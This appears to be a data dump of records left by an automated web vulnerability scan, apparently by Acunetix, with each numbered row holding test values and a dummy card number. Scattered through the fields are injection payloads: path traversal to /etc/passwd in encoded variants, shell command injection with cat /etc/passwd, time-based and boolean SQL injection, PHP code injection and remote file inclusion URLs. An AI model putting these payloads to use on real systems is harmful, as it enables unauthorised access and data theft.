457 2017-12-08 13:46:23Z 1 1&n952578=v965541 1 4111111111111111 1 1 1 1 1 1 1 1 1
458 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 testasp.vulnweb.com 1 1 1
459 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1e309 1
460 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 /\../\../\../\../\../\../\../etc/passwd 1 1 1 1
461 2017-12-08 13:46:23Z 1 1 1 4111111111111111 ) 1 1 1 1 1 1 1 1
462 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 '&cat /etc/passwd&' 1 1 1
463 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1"; waitfor delay '0:0:4' -- 1 1 1 1 1 1 1 1
464 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 WEB-INF/web.xml 1 1 1 1
465 2017-12-08 13:46:23Z 1 1 1&n951307=v934612 4111111111111111 1 1 1 1 1 1 1 1 1
466 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg 1
467 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 '"\'\");|]*{
468 1
469 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1&n943103=v961287 1 1 1 1 1 1 1
470 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 WEB-INF\web.xml 1 1 1 1
471 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 "&cat /etc/passwd&" 1 1 1
472 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
473 2017-12-08 13:46:23Z 1 1 1 4111111111111111 !(()&&!|*|*| 1 1 1 1 1 1 1 1
474 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1&n957370=v962649 1 1
475 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 Array 1
476 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1some_inexistent_file_with_long_name%00.jpg 1
477 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1&n988875=v942795 1 1 1 1 1
478 2017-12-08 13:46:23Z 1 1 1 4111111111111111 ^(#$!@#$)(()))****** 1 1 1 1 1 1 1 1
479 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
480 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 ../../../../../../../../../../etc/passwd 1 1 1 1 1 1
481 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1
482
483 1 1 1
484 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
485 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 -1 or 49=49 1 1 1 1
486 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 http://testasp.vulnweb.com/t/fit.txt?%00.jpg 1
487 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1&n954041=v932972
488 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 ) 1 1 1 1
489 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1 1 1 1 1
490 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 `cat /etc/passwd` 1 1 1
491 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 testasp.vulnweb.com 1
492 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 -1 or 49=0 1 1 1 1
493 2017-12-08 13:46:23Z 1 268435455 1 4111111111111111 1 1 1 1 1 1 1 1 1
494 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 ../../../../../../../../../../etc/passwd.jpg 1 1 1 1 1 1
495 2017-12-08 13:46:24Z 1 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg 1 4111111111111111 1 1 1 1 1 1 1 1 1
496 2017-12-08 13:46:24Z 1&n979110=v987035 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
497 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 -1 or 49-47=2 1 1 1 1
498 2017-12-08 13:46:23Z 1 1 1 4111111111111111 1 1 1 1 1 |cat /etc/passwd# 1 1 1
499 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 !(()&&!|*|*| 1 1 1 1
500 2017-12-08 13:46:24Z 1 h 1 4111111111111111 1 1 1 1 1 1 1 1 1
501 2017-12-08 13:46:24Z 1 .. 1 4111111111111111 1 1 1 1 1 1 1 1 1
502 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n 1 1 1 1 1 1
503 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 '|'ld 1 1 1
504 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 ^(#$!@#$)(()))****** 1 1 1 1
505 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 -1' or '25'='25 1 1 1 1
506 2017-12-08 13:46:24Z 1 1some_inexistent_file_with_long_name%00.jpg 1 4111111111111111 1 1 1 1 1 1 1 1 1
507 2017-12-08 13:46:24Z 1 1 1 Array 1 1 1 1 1 1 1 1 1
508 2017-12-08 13:46:24Z 1 1e309 1 4111111111111111 1 1 1 1 1 1 1 1 1
509 2017-12-08 13:46:24Z 1 1 1 '"() 1 1 1 1 1 1 1 1 1
510 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 "|"ld 1 1 1
511 2017-12-08 13:46:24Z 1 '"\'\");|]*{
512 1 4111111111111111 1 1 1 1 1 1 1 1 1
513 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 -1' or '25'='0 1 1 1 1
514 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1 1 1 1 1
515 2017-12-08 13:46:24Z 1 http://testasp.vulnweb.com/t/fit.txt?%00.jpg 1 4111111111111111 1 1 1 1 1 1 1 1 1
516 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 ) 1 1 1 1 1 1
517 2017-12-08 13:46:24Z 1 1 1 4111111111111111 Array 1 1 1 1 1 1 1 1
518 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 ;cat /etc/passwd; 1 1 1
519 2017-12-08 13:46:24Z 1 Array 1 4111111111111111 1 1 1 1 1 1 1 1 1
520 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 /../..//../..//../..//../..//../..//etc/passwd.jpg 1 1 1 1 1 1
521 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 -1' or '23'='23 1 1 1 1
522 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 !(()&&!|*|*| 1 1 1 1 1 1
523 2017-12-08 13:46:24Z 1 testasp.vulnweb.com 1 4111111111111111 1 1 1 1 1 1 1 1 1
524 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 -1" or "12"="12 1 1 1 1
525 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
526 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 1 1 1 1 1 1
527 2017-12-08 13:46:24Z 1 1 1 4111111111111111 '"() 1 1 1 1 1 1 1 1
528 2017-12-08 13:46:24Z 1 1 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg 4111111111111111 1 1 1 1 1 1 1 1 1
529 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 ';cat /etc/passwd;' 1 1 1
530 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 ^(#$!@#$)(()))****** 1 1 1 1 1 1
531 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 Array 1 1 1 1
532 2017-12-08 13:46:24Z 1 1 1some_inexistent_file_with_long_name%00.jpg 4111111111111111 1 1 1 1 1 1 1 1 1
533 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 -1" or "12"="0 1 1 1 1
534 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 ";cat /etc/passwd;" 1 1 1
535 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 /etc/passwd 1 1 1 1 1 1
536 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 -1" or "10"="10 1 1 1 1
537 2017-12-08 13:46:24Z 1 1 268435455 4111111111111111 1 1 1 1 1 1 1 1 1
538 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 '"() 1 1 1 1
539 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 ||cat /etc/passwd 1 1 1
540 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 ) 1 1 1
541 2017-12-08 13:46:24Z 1 1 http://testasp.vulnweb.com/t/fit.txt?%00.jpg 4111111111111111 1 1 1 1 1 1 1 1 1
542 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 1 1 1 1 1 1
543 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 and sleep(4) 1 1 1 1
544 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 Array 1 1 1 1 1 1
545 2017-12-08 13:46:24Z 1 1 h 4111111111111111 1 1 1 1 1 1 1 1 1
546 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 1 1 1 1 1 1
547 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 &cat /etc/passwd& 1
548 2017-12-08 13:46:24Z 1 1 testasp.vulnweb.com 4111111111111111 1 1 1 1 1 1 1 1 1
549 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 !(()&&!|*|*| 1 1 1
550 2017-12-08 13:46:24Z 1 1 .. 4111111111111111 1 1 1 1 1 1 1 1 1
551 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 '"() 1 1 1 1 1 1
552 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 ................etc/passwd 1 1 1 1 1 1
553 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 '&cat /etc/passwd&' 1
554 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg 1 1 1 1 1 1 1
555 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 ^(#$!@#$)(()))****** 1 1 1
556 2017-12-08 13:46:24Z 1 1 1e309 4111111111111111 1 1 1 1 1 1 1 1 1
557 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 1 1 1 1 1 1
558 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 Array 1 1 1
559 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 or (sleep(4)+1) limit 1 -- 1 1 1 1
560 2017-12-08 13:46:24Z 1 1 '"\'\");|]*{
561 4111111111111111 1 1 1 1 1 1 1 1 1
562 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 file:///etc/passwd 1 1 1 1 1 1
563 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 "&cat /etc/passwd&" 1
564 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ) 1
565 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1some_inexistent_file_with_long_name%00.jpg 1 1 1 1 1 1 1
566 2017-12-08 13:46:24Z 1 1 Array 4111111111111111 1 1 1 1 1 1 1 1 1
567 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 '"() 1 1 1
568 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 /\../\../\../\../\../\../\../etc/passwd 1 1 1 1 1 1
569 2017-12-08 13:46:24Z 1 1 1 4111111111111111 1 1 1 1 1 1 1
570
571 1
572 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1' and sleep(4)=' 1 1 1 1
573 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 Array 1
574 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
575 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 WEB-INF/web.xml 1 1 1 1 1 1
576 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 `cat /etc/passwd` 1
577 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 '"() 1
578 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 http://testasp.vulnweb.com/t/fit.txt?%00.jpg 1 1 1 1 1 1 1
579 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1
580 2017-12-08 13:46:25Z 1 Array 1 4111111111111111 1 1 1 1 1 1 1 1 1
581 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 !(()&&!|*|*| 1
582 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1' and (sleep(4)+1) limit 1 -- 1 1 1 1
583 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 268435455 1 1 1 1 1 1 1
584 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 testasp.vulnweb.com 1 1 1 1 1 1 1
585 2017-12-08 13:46:25Z 1 '"() 1 4111111111111111 1 1 1 1 1 1 1 1 1
586 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 WEB-INF\web.xml 1 1 1 1 1 1
587 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 |cat /etc/passwd# 1
588 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ^(#$!@#$)(()))****** 1
589 2017-12-08 13:46:25Z 1 1 Array 4111111111111111 1 1 1 1 1 1 1 1 1
590 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 ../../../../../../../../../../etc/passwd 1 1 1
591 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 '|'ld 1
592 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg 1 1
593 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 h 1 1 1 1 1 1 1
594 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1" and sleep(4)=" 1 1 1 1
595 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1 1
596 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1some_inexistent_file_with_long_name%00.jpg 1 1
597 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 .. 1 1 1 1 1 1 1
598 2017-12-08 13:46:25Z 1 1 '"() 4111111111111111 1 1 1 1 1 1 1 1 1
599 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 "|"ld 1
600 2017-12-08 13:46:25Z 1 ) 1 4111111111111111 1 1 1 1 1 1 1 1 1
601 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 ../../../../../../../../../../etc/passwd.jpg 1 1 1
602 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1' or (sleep(4)+1) limit 1 -- 1 1 1 1
603 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n 1 1 1
604 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 Array 1 1 1 1 1 1 1
605 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ;cat /etc/passwd; 1
606 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1e309 1 1 1 1 1 1 1
607 2017-12-08 13:46:25Z 1 !(()&&!|*|*| 1 4111111111111111 1 1 1 1 1 1 1 1 1
608 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 '"() 1 1 1 1 1 1 1
609 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 http://testasp.vulnweb.com/t/fit.txt?%00.jpg 1 1
610 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ';cat /etc/passwd;' 1
611 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 '"\'\");|]*{
612 1 1 1 1 1 1 1
613 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1 1
614 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1" or (sleep(4)+1) limit 1 -- 1 1 1 1
615 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 Array 1 1 1 1 1 1 1
616 2017-12-08 13:46:25Z 1 ^(#$!@#$)(()))****** 1 4111111111111111 1 1 1 1 1 1 1 1 1
617 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 /../..//../..//../..//../..//../..//etc/passwd.jpg 1 1 1
618 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
619 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 testasp.vulnweb.com 1 1
620 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1'=sleep(4)=' 1 1 1 1
621 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 Array 1 1
622 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1
623 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ";cat /etc/passwd;" 1
624 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg 1 1 1 1 1
625 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 1 1 1
626 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 '"() 1 1
627 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 268435455 1 1
628 2017-12-08 13:46:25Z 1 1 ) 4111111111111111 1 1 1 1 1 1 1 1 1
629 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 /etc/passwd 1 1 1
630 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1"=sleep(4)=" 1 1 1 1
631 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 Array 1 1 1 1 1
632 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ||cat /etc/passwd 1
633 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 1 1 1
634 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 h 1 1
635 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1some_inexistent_file_with_long_name%00.jpg 1 1 1 1 1
636 2017-12-08 13:46:25Z 1 1 !(()&&!|*|*| 4111111111111111 1 1 1 1 1 1 1 1 1
637 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 '"() 1 1 1 1 1
638 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1;select pg_sleep(4); -- 1 1 1 1
639 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 .. 1 1
640 2017-12-08 13:46:25Z 1 &cat /etc/passwd& 1 4111111111111111 1 1 1 1 1 1 1 1 1
641 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 Array
642 2017-12-08 13:46:25Z 1 1 1 4111111111111111 1 1 1 1 1 ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 1 1 1
643 2017-12-08 13:46:26Z 1 1 ^(#$!@#$)(()))****** 4111111111111111 1 1 1 1 1 1 1 1 1
644 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 http://testasp.vulnweb.com/t/fit.txt?%00.jpg 1 1 1 1 1
645 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1e309 1 1
646 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 '"()
647 2017-12-08 13:46:26Z 1 '&cat /etc/passwd&' 1 4111111111111111 1 1 1 1 1 1 1 1 1
648 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 ................etc/passwd 1 1 1
649 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1';select pg_sleep(4); -- 1 1 1 1
650 2017-12-08 13:46:26Z Array 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
651 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 '"\'\");|]*{
652 1 1
653 2017-12-08 13:46:26Z 1 "&cat /etc/passwd&" 1 4111111111111111 1 1 1 1 1 1 1 1 1
654 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 testasp.vulnweb.com 1 1 1 1 1
655 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 ) 1 1 1 1 1 1 1
656 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 Array 1 1
657 2017-12-08 13:46:26Z 1
658
659 1 4111111111111111 1 1 1 1 1 1 1 1 1
660 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 1 1 1
661 2017-12-08 13:46:26Z '"() 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
662 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1; waitfor delay '0:0:4' -- 1 1 1 1
663 2017-12-08 13:46:26Z 1 1 1 ;print(md5(acunetix_wvs_security_test)); 1 1 1 1 1 1 1 1 1
664 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 file:///etc/passwd 1 1 1
665 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
666 2017-12-08 13:46:26Z 1 `cat /etc/passwd` 1 4111111111111111 1 1 1 1 1 1 1 1 1
667 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
668 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 !(()&&!|*|*| 1 1 1 1 1 1 1
669 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1'; waitfor delay '0:0:4' -- 1 1 1 1
670 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 /\../\../\../\../\../\../\../etc/passwd 1 1 1
671 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1some_inexistent_file_with_long_name%00.jpg
672 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1
673 2017-12-08 13:46:26Z 1 |cat /etc/passwd# 1 4111111111111111 1 1 1 1 1 1 1 1 1
674 2017-12-08 13:46:26Z 1 1 1 ';print(md5(acunetix_wvs_security_test));$a=' 1 1 1 1 1 1 1 1 1
675 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 WEB-INF/web.xml 1 1 1
676 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 http://testasp.vulnweb.com/t/fit.txt?%00.jpg
677 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 ^(#$!@#$)(()))****** 1 1 1 1 1 1 1
678 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1"; waitfor delay '0:0:4' -- 1 1 1 1
679 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 WEB-INF\web.xml 1 1 1
680 2017-12-08 13:46:26Z 1 '|'ld 1 4111111111111111 1 1 1 1 1 1 1 1 1
681 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 268435455 1 1 1 1 1
682 2017-12-08 13:46:26Z 1 1 1 ";print(md5(acunetix_wvs_security_test));$a=" 1 1 1 1 1 1 1 1 1
683 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ../../../../../../../../../../etc/passwd 1
684 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 ) 1 1
685 2017-12-08 13:46:26Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
